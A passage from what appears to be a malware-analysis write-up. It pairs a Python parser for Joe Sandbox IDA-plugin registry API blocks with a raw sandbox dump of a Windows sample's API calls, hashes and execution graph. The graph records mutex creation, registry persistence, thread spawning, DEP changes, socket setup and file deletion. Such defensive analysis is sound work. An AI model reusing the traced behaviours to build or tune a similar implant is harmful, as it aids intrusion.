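    # samDesired is argument 4 of RegOpenKeyExW and argument 6 of RegCreateKeyExW
    access = call.args[3] if call.api == "RegOpenKeyExW" else call.args[5]
    return {
        "hive": HIVES.get(hive, hex(hive)) if isinstance(hive, int) else "?",
        "subkey": subkey if isinstance(subkey, str) else "?",
        "access": decode_access(access) if isinstance(access, int) else ["?"],
    }

def registry_writes(calls: list[ApiCall]) -> list[str]:
    """Names of calls in the block that create keys or set values."""
    return [c.api for c in calls if c.api in ("RegCreateKeyExW", "RegSetValueExW")]

# Copied from the report block above (process 5, image base 00B00000).
SAMPLE = r"""
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00B2CD40,0000001C,00B26901), ref: 00B256A8
  • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00B25778
  • Part of subcall function 00B264DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B2650F
  • Part of subcall function 00B264DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00), ref: 00B26545
"""

if __name__ == "__main__":
    for c in parse_api_block(SAMPLE):
        print(f"{c.ref:08X} {c.api}.{c.module} sub={c.subcall} {describe_reg_open(c)}")
```

Arguments past the documented parameter count (for example `00B2CD40,0000001C,00B26901` after the five `RegOpenKeyExW` parameters) are stack slots the plugin printed beyond the call's real arguments; the decoder indexes only the documented positions and ignores the rest.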
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00B2CCE0,0000001C,00B26931), ref: 00B25E32
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00B25EFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$CloseOpeniswspace
                                                                            • String ID: Software\Classes
                                                                            • API String ID: 2439148603-1656466771
                                                                            • Opcode ID: b73cba7278120b241deb928d7ef9fc2191b541d0bb1423c645156528154f377e
                                                                            • Instruction ID: 6aaab7a41ba8a7c0d4748da9b9b5eeb43fe1fe44092aa4891a7120e0b3b3d938
                                                                            • Opcode Fuzzy Hash: b73cba7278120b241deb928d7ef9fc2191b541d0bb1423c645156528154f377e
                                                                            • Instruction Fuzzy Hash: 49319571E147248FDB24EFA8D8516AE77F5EF48710F2180AEE00AB72D1EE715D418B54
                                                                            APIs
                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00B0B11F), ref: 00B1CB8B
                                                                            • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00B1CC2D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleTitle
                                                                            • String ID: -
                                                                            • API String ID: 3358957663-3695764949
                                                                            • Opcode ID: 97a29f5c8df933572694e32be7a0895d1cc7d6c4790221d45f948134168ec632
                                                                            • Instruction ID: d4c909d9daae7f0cefe19b06b8f388a94b6b9e2ca79d82f41113be3cdd2da1f8
                                                                            • Opcode Fuzzy Hash: 97a29f5c8df933572694e32be7a0895d1cc7d6c4790221d45f948134168ec632
                                                                            • Instruction Fuzzy Hash: 88213B317002049BC729AB6CD8957BE7FE6EB80704F6845ECE902573D4DE749D8687C1
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B28AC9
                                                                            • printf.MSVCRT ref: 00B28B24
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                            • String ID: %3d
                                                                            • API String ID: 2845598586-2138283368
                                                                            • Opcode ID: 03d68e088b3e95f0a74b3562ca74b43c12300f2620dc6bb5573724fced326e48
                                                                            • Instruction ID: 1a1458621e05fdd7910cf5358e1da9bfdffb64ae8b17d904d2a918e22abd6791
                                                                            • Opcode Fuzzy Hash: 03d68e088b3e95f0a74b3562ca74b43c12300f2620dc6bb5573724fced326e48
                                                                            • Instruction Fuzzy Hash: CB012D71650204BBE7116F559C87FDB3EEDDB85BE0F044095FB08950C1DAB19DA0C6B1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswspacewcschr
                                                                            • String ID: =,;
                                                                            • API String ID: 287713880-1539845467
                                                                            • Opcode ID: 0d1517504c11dad99049351b5c09aee189818026c048afa8a4dc81378795b558
                                                                            • Instruction ID: 46cc38b58a17ddcd9b9e56565a69951cac60342d2b0282a737a7c14efd22d302
                                                                            • Opcode Fuzzy Hash: 0d1517504c11dad99049351b5c09aee189818026c048afa8a4dc81378795b558
                                                                            • Instruction Fuzzy Hash: 8DE04F376047229AD634065DBC58877BEDBDFE7B6131A08DBFC04A31D4FAA04C408197

                                                                            Execution Graph

                                                                            Execution Coverage:2%
                                                                            Dynamic/Decrypted Code Coverage:99%
                                                                            Signature Coverage:3.6%
                                                                            Total number of Nodes:1190
                                                                            Total number of Limit Nodes:44
                                                                            execution_graph 93573 469bea8 93575 469beb4 _swprintf ___FrameUnwindToState 93573->93575 93574 469bec2 93589 46a062d 20 API calls __dosmaperr 93574->93589 93575->93574 93577 469beec 93575->93577 93584 46a5909 EnterCriticalSection 93577->93584 93579 469bec7 pre_c_initialization ___FrameUnwindToState 93580 469bef7 93585 469bf98 93580->93585 93584->93580 93587 469bfa6 93585->93587 93586 469bf02 93590 469bf1f LeaveCriticalSection std::_Lockit::~_Lockit 93586->93590 93587->93586 93591 46a97ec 37 API calls 2 library calls 93587->93591 93589->93579 93590->93579 93591->93587 93592 4694918 93593 4694924 ___FrameUnwindToState 93592->93593 93619 4694627 93593->93619 93595 469492b 93597 4694954 93595->93597 93921 4694a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 93595->93921 93603 4694993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93597->93603 93630 46a42d2 93597->93630 93601 4694973 ___FrameUnwindToState 93602 46949f3 93634 4694ba5 93602->93634 93603->93602 93923 46a3487 36 API calls 5 library calls 93603->93923 93612 4694a15 93613 4694a1f 93612->93613 93925 46a34bf 28 API calls _Atexit 93612->93925 93615 4694a28 93613->93615 93926 46a3462 28 API calls _Atexit 93613->93926 93927 469479e 13 API calls 2 library calls 93615->93927 93618 4694a30 93618->93601 93620 4694630 93619->93620 93928 4694cb6 IsProcessorFeaturePresent 93620->93928 93622 469463c 93929 4698fb1 10 API calls 4 library calls 93622->93929 93624 4694641 93625 4694645 93624->93625 93930 46a415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93624->93930 93625->93595 93627 469464e 93628 469465c 93627->93628 93931 4698fda 8 API calls 3 library calls 93627->93931 93628->93595 93631 46a42e9 93630->93631 93932 469502b 93631->93932 93633 469496d 93633->93601 93922 46a4276 
5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 93633->93922 93940 4696f10 93634->93940 93636 4694bb8 GetStartupInfoW 93637 46949f9 93636->93637 93638 46a4223 93637->93638 93942 46af0d9 93638->93942 93640 46a422c 93641 4694a02 93640->93641 93946 46a6895 36 API calls 93640->93946 93643 466ea00 93641->93643 93948 467cbe1 LoadLibraryA GetProcAddress 93643->93948 93645 466ea1c GetModuleFileNameW 93953 466f3fe 93645->93953 93647 466ea38 93968 46620f6 93647->93968 93650 46620f6 28 API calls 93651 466ea56 93650->93651 93974 467beac 93651->93974 93655 466ea68 94000 4661e8d 93655->94000 93657 466ea71 93658 466ea84 93657->93658 93659 466eace 93657->93659 94264 466fbee 97 API calls 93658->94264 94006 4661e65 93659->94006 93662 466eade 93666 4661e65 22 API calls 93662->93666 93663 466ea96 93664 4661e65 22 API calls 93663->93664 93665 466eaa2 93664->93665 94265 4670f72 36 API calls __EH_prolog 93665->94265 93667 466eafd 93666->93667 94011 466531e 93667->94011 93670 466eb0c 94016 4666383 93670->94016 93671 466eab4 94266 466fb9f 78 API calls 93671->94266 93675 466eabd 94267 466f3eb 71 API calls 93675->94267 93680 4661fd8 11 API calls 93683 466ef36 93680->93683 93682 4661fd8 11 API calls 93684 466eb36 93682->93684 93924 46a3396 GetModuleHandleW 93683->93924 93685 4661e65 22 API calls 93684->93685 93686 466eb3f 93685->93686 94033 4661fc0 93686->94033 93688 466eb4a 93689 4661e65 22 API calls 93688->93689 93690 466eb63 93689->93690 93691 4661e65 22 API calls 93690->93691 93692 466eb7e 93691->93692 93693 466ebe9 93692->93693 94268 4666c59 93692->94268 93695 4661e65 22 API calls 93693->93695 93699 466ebf6 93695->93699 93696 466ebab 93697 4661fe2 28 API calls 93696->93697 93698 466ebb7 93697->93698 93701 4661fd8 11 API calls 93698->93701 93700 466ec3d 93699->93700 93705 4673584 3 API calls 93699->93705 94037 466d0a4 93700->94037 93702 466ebc0 93701->93702 94273 4673584 RegOpenKeyExA 93702->94273 93704 466ec43 93706 466eac6 93704->93706 94040 467b354 93704->94040 93712 466ec21 
93705->93712 93706->93680 93710 466ec5e 93713 466ecb1 93710->93713 94057 4667751 93710->94057 93711 466f38a 94351 46739e4 30 API calls 93711->94351 93712->93700 94276 46739e4 30 API calls 93712->94276 93716 4661e65 22 API calls 93713->93716 93719 466ecba 93716->93719 93729 466ecc6 93719->93729 93730 466eccb 93719->93730 93720 466f3a0 94352 46724b0 65 API calls ___scrt_get_show_window_mode 93720->94352 93722 466ec87 93724 4661e65 22 API calls 93722->93724 93723 466ec7d 94277 4667773 30 API calls 93723->94277 93737 466ec90 93724->93737 93725 466f3aa 93727 467bcef 28 API calls 93725->93727 93732 466f3ba 93727->93732 93728 466ec82 94278 466729b 98 API calls 93728->94278 94280 4667790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 93729->94280 93731 4661e65 22 API calls 93730->93731 93735 466ecd4 93731->93735 94167 4673a5e RegOpenKeyExW 93732->94167 94061 467bcef 93735->94061 93737->93713 93741 466ecac 93737->93741 93738 466ecdf 94065 4661f13 93738->94065 94279 466729b 98 API calls 93741->94279 93745 4661f09 11 API calls 93747 466f3d7 93745->93747 93749 4661f09 11 API calls 93747->93749 93751 466f3e0 93749->93751 93750 4661e65 22 API calls 93752 466ecfc 93750->93752 94170 466dd7d 93751->94170 93756 4661e65 22 API calls 93752->93756 93758 466ed16 93756->93758 93757 466f3ea 93759 4661e65 22 API calls 93758->93759 93760 466ed30 93759->93760 93761 4661e65 22 API calls 93760->93761 93762 466ed49 93761->93762 93763 466edb6 93762->93763 93764 4661e65 22 API calls 93762->93764 93765 466edc5 93763->93765 93771 466ef41 ___scrt_get_show_window_mode 93763->93771 93769 466ed5e _wcslen 93764->93769 93766 466edce 93765->93766 93794 466ee4a ___scrt_get_show_window_mode 93765->93794 93767 4661e65 22 API calls 93766->93767 93768 466edd7 93767->93768 93770 4661e65 22 API calls 93768->93770 93769->93763 93772 4661e65 22 API calls 93769->93772 93773 466ede9 93770->93773 94341 4673733 RegOpenKeyExA 93771->94341 93774 466ed79 93772->93774 93776 4661e65 22 API calls 
93773->93776 93777 4661e65 22 API calls 93774->93777 93778 466edfb 93776->93778 93779 466ed8e 93777->93779 93782 4661e65 22 API calls 93778->93782 94281 466da6f 93779->94281 93780 466ef8c 93781 4661e65 22 API calls 93780->93781 93783 466efb1 93781->93783 93785 466ee24 93782->93785 94087 4662093 93783->94087 93788 4661e65 22 API calls 93785->93788 93787 4661f13 28 API calls 93790 466edad 93787->93790 93791 466ee35 93788->93791 93793 4661f09 11 API calls 93790->93793 94339 466ce34 45 API calls _wcslen 93791->94339 93792 466efc3 94093 46737aa RegCreateKeyA 93792->94093 93793->93763 94077 4673982 93794->94077 93798 466eede ctype 93803 4661e65 22 API calls 93798->93803 93799 466ee45 93799->93794 93801 4661e65 22 API calls 93802 466efe5 93801->93802 94099 469bb2c 93802->94099 93804 466eef5 93803->93804 93804->93780 93808 466ef09 93804->93808 93807 466effc 94344 467ce2c 87 API calls ___scrt_get_show_window_mode 93807->94344 93810 4661e65 22 API calls 93808->93810 93809 466f01f 93814 4662093 28 API calls 93809->93814 93812 466ef12 93810->93812 93815 467bcef 28 API calls 93812->93815 93813 466f003 CreateThread 93813->93809 95028 467d4ee 10 API calls 93813->95028 93816 466f034 93814->93816 93817 466ef1e 93815->93817 93818 4662093 28 API calls 93816->93818 94340 466f4af 104 API calls 93817->94340 93820 466f043 93818->93820 94103 467b580 93820->94103 93821 466ef23 93821->93780 93823 466ef2a 93821->93823 93823->93706 93825 4661e65 22 API calls 93826 466f054 93825->93826 93827 4661e65 22 API calls 93826->93827 93828 466f066 93827->93828 93829 4661e65 22 API calls 93828->93829 93830 466f086 93829->93830 93831 469bb2c 40 API calls 93830->93831 93832 466f093 93831->93832 93833 4661e65 22 API calls 93832->93833 93834 466f09e 93833->93834 93835 4661e65 22 API calls 93834->93835 93836 466f0af 93835->93836 93837 4661e65 22 API calls 93836->93837 93838 466f0c4 93837->93838 93839 4661e65 22 API calls 93838->93839 93840 466f0d5 93839->93840 93841 466f0dc StrToIntA 93840->93841 94127 
4669e1f 93841->94127 93844 4661e65 22 API calls 93845 466f0f7 93844->93845 93846 466f103 93845->93846 93847 466f13c 93845->93847 94345 469455e 22 API calls 3 library calls 93846->94345 93850 4661e65 22 API calls 93847->93850 93849 466f10c 93851 4661e65 22 API calls 93849->93851 93852 466f14c 93850->93852 93853 466f11f 93851->93853 93854 466f194 93852->93854 93855 466f158 93852->93855 93856 466f126 CreateThread 93853->93856 93858 4661e65 22 API calls 93854->93858 94346 469455e 22 API calls 3 library calls 93855->94346 93856->93847 95026 467a045 103 API calls __EH_prolog 93856->95026 93860 466f19d 93858->93860 93859 466f161 93861 4661e65 22 API calls 93859->93861 93863 466f207 93860->93863 93864 466f1a9 93860->93864 93862 466f173 93861->93862 93865 466f17a CreateThread 93862->93865 93866 4661e65 22 API calls 93863->93866 93867 4661e65 22 API calls 93864->93867 93865->93854 95030 467a045 103 API calls __EH_prolog 93865->95030 93868 466f210 93866->93868 93869 466f1b9 93867->93869 93870 466f255 93868->93870 93871 466f21c 93868->93871 93872 4661e65 22 API calls 93869->93872 94152 467b69e 93870->94152 93873 4661e65 22 API calls 93871->93873 93874 466f1ce 93872->93874 93876 466f225 93873->93876 94347 466da23 31 API calls 93874->94347 93882 4661e65 22 API calls 93876->93882 93878 4661f13 28 API calls 93879 466f269 93878->93879 93881 4661f09 11 API calls 93879->93881 93884 466f272 93881->93884 93885 466f23a 93882->93885 93883 466f1e1 93886 4661f13 28 API calls 93883->93886 93887 466f27e CreateThread 93884->93887 93888 466f27b SetProcessDEPPolicy 93884->93888 93895 469bb2c 40 API calls 93885->93895 93889 466f1ed 93886->93889 93890 466f293 CreateThread 93887->93890 93891 466f29f 93887->93891 94999 466f7e2 93887->94999 93888->93887 93892 4661f09 11 API calls 93889->93892 93890->93891 95027 4672132 138 API calls 93890->95027 93893 466f2b4 93891->93893 93894 466f2a8 CreateThread 93891->93894 93896 466f1f6 CreateThread 93892->93896 93898 466f307 93893->93898 93900 4662093 28 API 
calls 93893->93900 93894->93893 95029 4672716 38 API calls ___scrt_get_show_window_mode 93894->95029 93897 466f247 93895->93897 93896->93863 95031 4661be9 50 API calls 93896->95031 94348 466c19d 7 API calls 93897->94348 94164 467353a RegOpenKeyExA 93898->94164 93901 466f2d7 93900->93901 94349 46652fd 28 API calls 93901->94349 93907 466f328 93909 467bcef 28 API calls 93907->93909 93911 466f338 93909->93911 94350 4673656 31 API calls 93911->94350 93915 466f34e 93916 4661f09 11 API calls 93915->93916 93918 466f359 93916->93918 93917 466f381 DeleteFileW 93917->93918 93919 466f388 93917->93919 93918->93725 93918->93917 93920 466f36f Sleep 93918->93920 93919->93725 93920->93918 93921->93595 93922->93603 93923->93602 93924->93612 93925->93613 93926->93615 93927->93618 93928->93622 93929->93624 93930->93627 93931->93625 93933 4695034 93932->93933 93934 4695036 IsProcessorFeaturePresent 93932->93934 93933->93633 93936 4695078 93934->93936 93939 469503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93936->93939 93938 469515b 93938->93633 93939->93938 93941 4696f27 93940->93941 93941->93636 93941->93941 93943 46af0e2 93942->93943 93944 46af0eb 93942->93944 93947 46aefd8 49 API calls 5 library calls 93943->93947 93944->93640 93946->93640 93947->93944 93949 467cc20 LoadLibraryA GetProcAddress 93948->93949 93950 467cc10 GetModuleHandleA GetProcAddress 93948->93950 93951 467cc49 44 API calls 93949->93951 93952 467cc39 LoadLibraryA GetProcAddress 93949->93952 93950->93949 93951->93645 93952->93951 94353 467b539 FindResourceA 93953->94353 93957 466f428 _Yarn 94363 46620b7 93957->94363 93960 4661fe2 28 API calls 93961 466f44e 93960->93961 93962 4661fd8 11 API calls 93961->93962 93963 466f457 93962->93963 93964 469bda0 _Yarn 21 API calls 93963->93964 93965 466f468 _Yarn 93964->93965 94369 4666e13 93965->94369 93967 466f49b 93967->93647 93969 466210c 93968->93969 93970 46623ce 11 API calls 93969->93970 93971 4662126 93970->93971 93972 4662569 
28 API calls 93971->93972 93973 4662134 93972->93973 93973->93650 94417 46620df 93974->94417 93976 4661fd8 11 API calls 93977 467bf61 93976->93977 93980 4661fd8 11 API calls 93977->93980 93978 467bf31 94423 46641a2 28 API calls 93978->94423 93979 467bebf 93979->93978 93988 4661fe2 28 API calls 93979->93988 93991 4661fd8 11 API calls 93979->93991 93995 467bf2f 93979->93995 94421 46641a2 28 API calls 93979->94421 94422 467cec5 28 API calls 93979->94422 93983 467bf69 93980->93983 93984 4661fd8 11 API calls 93983->93984 93986 466ea5f 93984->93986 93985 467bf3d 93987 4661fe2 28 API calls 93985->93987 93996 466fb52 93986->93996 93989 467bf46 93987->93989 93988->93979 93990 4661fd8 11 API calls 93989->93990 93992 467bf4e 93990->93992 93991->93979 94424 467cec5 28 API calls 93992->94424 93995->93976 93997 466fb65 93996->93997 93998 466fb5e 93996->93998 93997->93655 94425 4662163 11 API calls 93998->94425 94002 4662163 94000->94002 94001 466219f 94001->93657 94002->94001 94426 4662730 11 API calls 94002->94426 94004 4662184 94427 4662712 11 API calls std::_Deallocate 94004->94427 94007 4661e6d 94006->94007 94008 4661e75 94007->94008 94428 4662158 22 API calls 94007->94428 94008->93662 94012 46620df 11 API calls 94011->94012 94013 466532a 94012->94013 94429 46632a0 94013->94429 94015 4665346 94015->93670 94433 46651ef 94016->94433 94018 4666391 94437 4662055 94018->94437 94021 4661fe2 94022 4661ff1 94021->94022 94029 4662039 94021->94029 94023 46623ce 11 API calls 94022->94023 94024 4661ffa 94023->94024 94025 466203c 94024->94025 94027 4662015 94024->94027 94026 466267a 11 API calls 94025->94026 94026->94029 94452 4663098 28 API calls 94027->94452 94030 4661fd8 94029->94030 94031 46623ce 11 API calls 94030->94031 94032 4661fe1 94031->94032 94032->93682 94034 4661fd2 94033->94034 94035 4661fc9 94033->94035 94034->93688 94453 46625e0 28 API calls 94035->94453 94454 4661fab 94037->94454 94039 466d0ae CreateMutexA GetLastError 94039->93704 94456 467c048 94040->94456 94045 
4661fe2 28 API calls 94046 467b390 94045->94046 94047 4661fd8 11 API calls 94046->94047 94048 467b398 94047->94048 94049 467b3ee 94048->94049 94050 46735e1 31 API calls 94048->94050 94049->93710 94051 467b3c1 94050->94051 94052 467b3cc StrToIntA 94051->94052 94053 467b3e3 94052->94053 94054 467b3da 94052->94054 94056 4661fd8 11 API calls 94053->94056 94464 467cffa 22 API calls 94054->94464 94056->94049 94058 4667765 94057->94058 94059 4673584 3 API calls 94058->94059 94060 466776c 94059->94060 94060->93722 94060->93723 94062 467bd03 94061->94062 94465 466b93f 94062->94465 94064 467bd0b 94064->93738 94066 4661f22 94065->94066 94073 4661f6a 94065->94073 94067 4662252 11 API calls 94066->94067 94068 4661f2b 94067->94068 94069 4661f6d 94068->94069 94070 4661f46 94068->94070 94498 4662336 94069->94498 94497 466305c 28 API calls 94070->94497 94074 4661f09 94073->94074 94075 4662252 11 API calls 94074->94075 94076 4661f12 94075->94076 94076->93750 94078 46739a0 94077->94078 94079 4666e13 28 API calls 94078->94079 94080 46739b5 94079->94080 94081 46620f6 28 API calls 94080->94081 94082 46739c5 94081->94082 94083 46737aa 14 API calls 94082->94083 94084 46739cf 94083->94084 94085 4661fd8 11 API calls 94084->94085 94086 46739dc 94085->94086 94086->93798 94088 466209b 94087->94088 94089 46623ce 11 API calls 94088->94089 94090 46620a6 94089->94090 94502 46624ed 94090->94502 94094 46737fa 94093->94094 94096 46737c3 94093->94096 94095 4661fd8 11 API calls 94094->94095 94097 466efd9 94095->94097 94098 46737d5 RegSetValueExA RegCloseKey 94096->94098 94097->93801 94098->94094 94100 469bb45 _swprintf 94099->94100 94506 469ae83 94100->94506 94102 466eff2 94102->93807 94102->93809 94104 467b596 GetLocalTime 94103->94104 94105 467b631 94103->94105 94107 466531e 28 API calls 94104->94107 94106 4661fd8 11 API calls 94105->94106 94108 467b639 94106->94108 94109 467b5d8 94107->94109 94110 4661fd8 11 API calls 94108->94110 94111 4666383 28 API calls 94109->94111 94113 466f048 94110->94113 
94112 467b5e4 94111->94112 94534 4662f10 94112->94534 94113->93825 94116 4666383 28 API calls 94117 467b5fc 94116->94117 94539 466723b 77 API calls 94117->94539 94119 467b60a 94120 4661fd8 11 API calls 94119->94120 94121 467b616 94120->94121 94122 4661fd8 11 API calls 94121->94122 94123 467b61f 94122->94123 94124 4661fd8 11 API calls 94123->94124 94125 467b628 94124->94125 94126 4661fd8 11 API calls 94125->94126 94126->94105 94128 4669e3d _wcslen 94127->94128 94129 4669e5f 94128->94129 94130 4669e48 94128->94130 94132 466da6f 31 API calls 94129->94132 94131 466da6f 31 API calls 94130->94131 94133 4669e50 94131->94133 94134 4669e67 94132->94134 94136 4661f13 28 API calls 94133->94136 94135 4661f13 28 API calls 94134->94135 94137 4669e75 94135->94137 94151 4669e5a 94136->94151 94138 4661f09 11 API calls 94137->94138 94139 4669e7d 94138->94139 94568 4669196 28 API calls 94139->94568 94140 4661f09 11 API calls 94142 4669eb4 94140->94142 94553 466a144 94142->94553 94143 4669e8f 94569 4663014 94143->94569 94148 4661f13 28 API calls 94149 4669ea4 94148->94149 94150 4661f09 11 API calls 94149->94150 94150->94151 94151->94140 94153 467b6c1 GetUserNameW 94152->94153 94621 466417e 94153->94621 94158 4663014 28 API calls 94159 467b703 94158->94159 94160 4661f09 11 API calls 94159->94160 94161 467b70c 94160->94161 94162 4661f09 11 API calls 94161->94162 94163 466f25e 94162->94163 94163->93878 94165 466f31f 94164->94165 94166 467355b RegQueryValueExA RegCloseKey 94164->94166 94165->93751 94165->93907 94166->94165 94168 466f3cd 94167->94168 94169 4673a7a RegDeleteValueW 94167->94169 94168->93745 94169->94168 94171 466dd96 94170->94171 94172 467353a 3 API calls 94171->94172 94173 466dd9d 94172->94173 94177 466ddbc 94173->94177 94713 4661707 94173->94713 94175 466ddaa 94716 46738b2 RegCreateKeyA 94175->94716 94178 4674f65 94177->94178 94179 46620df 11 API calls 94178->94179 94180 4674f79 94179->94180 94730 467b944 94180->94730 94183 46620df 11 API calls 94184 4674f8f 94183->94184 
94185 4661e65 22 API calls 94184->94185 94186 4674f9d 94185->94186 94187 469bb2c 40 API calls 94186->94187 94188 4674faa 94187->94188 94189 4674faf Sleep 94188->94189 94190 4674fbc 94188->94190 94189->94190 94191 4662093 28 API calls 94190->94191 94192 4674fcb 94191->94192 94193 4661e65 22 API calls 94192->94193 94194 4674fd4 94193->94194 94195 46620f6 28 API calls 94194->94195 94196 4674fdf 94195->94196 94197 467beac 28 API calls 94196->94197 94198 4674fe7 94197->94198 94734 466489e WSAStartup 94198->94734 94200 4674ff1 94201 4661e65 22 API calls 94200->94201 94202 4674ffa 94201->94202 94203 4661e65 22 API calls 94202->94203 94227 4675079 94202->94227 94204 4675013 94203->94204 94205 4661e65 22 API calls 94204->94205 94207 4675024 94205->94207 94206 46620f6 28 API calls 94206->94227 94209 4661e65 22 API calls 94207->94209 94208 467beac 28 API calls 94208->94227 94210 4675035 94209->94210 94212 4661e65 22 API calls 94210->94212 94211 4666c59 28 API calls 94211->94227 94213 4675046 94212->94213 94215 4661e65 22 API calls 94213->94215 94214 4661fe2 28 API calls 94214->94227 94216 4675057 94215->94216 94217 4661e65 22 API calls 94216->94217 94218 4675069 94217->94218 94908 466473d 89 API calls 94218->94908 94220 4661e65 22 API calls 94220->94227 94222 46751c7 WSAGetLastError 94909 467cb72 30 API calls 94222->94909 94227->94206 94227->94208 94227->94211 94227->94214 94227->94220 94227->94222 94230 466531e 28 API calls 94227->94230 94231 4661e8d 11 API calls 94227->94231 94232 469bb2c 40 API calls 94227->94232 94234 4662093 28 API calls 94227->94234 94235 467b580 80 API calls 94227->94235 94238 4669097 28 API calls 94227->94238 94240 4673733 3 API calls 94227->94240 94241 46735e1 31 API calls 94227->94241 94242 466417e 28 API calls 94227->94242 94245 467bdaf 28 API calls 94227->94245 94246 467bc1f 28 API calls 94227->94246 94247 4661e65 22 API calls 94227->94247 94254 4662ea1 28 API calls 94227->94254 94255 4666383 28 API calls 94227->94255 94256 4662f10 28 API calls 
